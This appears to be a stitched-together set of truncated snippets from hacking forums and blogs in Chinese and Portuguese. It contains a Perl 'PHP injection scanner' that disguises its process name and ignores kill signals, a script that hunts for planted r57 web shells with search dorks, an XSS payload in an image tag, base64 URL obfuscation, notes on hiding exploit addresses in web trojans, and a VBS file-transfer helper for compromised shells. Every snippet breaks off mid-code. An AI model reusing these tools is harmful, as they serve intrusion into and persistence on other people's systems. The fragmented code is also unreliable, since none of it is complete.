#!/usr/bin/perl
 
use LWP::Simple;
use IO::Socket::INET;
 
 
 
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n";
 
if(!@ARGV[0]){
print "\t[ use: perl php5.0.pl <procura> ]\n\n";
exit;
}
print "\t[ Camuflando pid ]\n";
my $processo = "/usr/local/sbin/httpd - spy";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"}

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

usage() unless $ARGV[2];

my @searchTerm;
my @checkTerm;

if(lc($ARGV[0]) eq "r57") {
        push(@searchTerm, "inurl:r57.php");
        push(@searchTerm, "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"");
        push(@searchTerm, "intitle:r57shell");
        push(@checkTerm, "r57");
        push(@checkTerm, "safe_mode

作者: Knight

<img src="javascript:
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
function

作者：云舒

代码很简单，就是用hash保存了端口和服务的对应，服务和最新版本的对应，然后判断扫描的结果是否符合预定义的情况。因为没几行，所以就没什么注释了，看看就明白了。

代码:

#!/usr/bin/perl

by 云舒

一次示例运行，结果如下：
代码:

$VAR1 = '219.153.22.10'; $VAR2 = [

JavaScript在FireFox中被支持的atob()方法能将base64码解密出正常的值，btoa()则正好相反。比如：

<script>
alert(atob(/aHR0cDovL3d3dy4weDM3LmNvbS8=/.toString().substr(1,27)));
alert(atob('aHR0cDovL3d3dy4weDM3LmNvbS8='));
</script>

Author: Greysign
2008-5-23
http://www.scanw.com/blog

余弦不久之前写了网马中枢，是关于服务端应用的一小角，他还说有其他更复杂的应用，一直等着他的BLOG更新，还是未见他写出来。最近大家都很忙。

关于网马代码，exploit固然重要，但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ，读取文件等方式来隐藏EXP的地址，不过，EXP代码完全暴露出来了，那就无法阻止代码被剽窃，被取证等行为。

我已经很

来源：vbs空间

有时,渗透时,溢出得个SHELL,或只有一个CMDSHELL,想下载些东西,或上传东西,时真是不方便啊

特别是当目标不能上网,或限制比较严格时…

ECHO东西,手工输入,那个累啊….还是弄个脚本方便些…

//把要ECHO的脚本,拖到此脚本上...根据提示操作即可
On Error Resume Next
Set Arg=Wscript.arguments
If Arg.count=0 then Wscript.quit
‘—————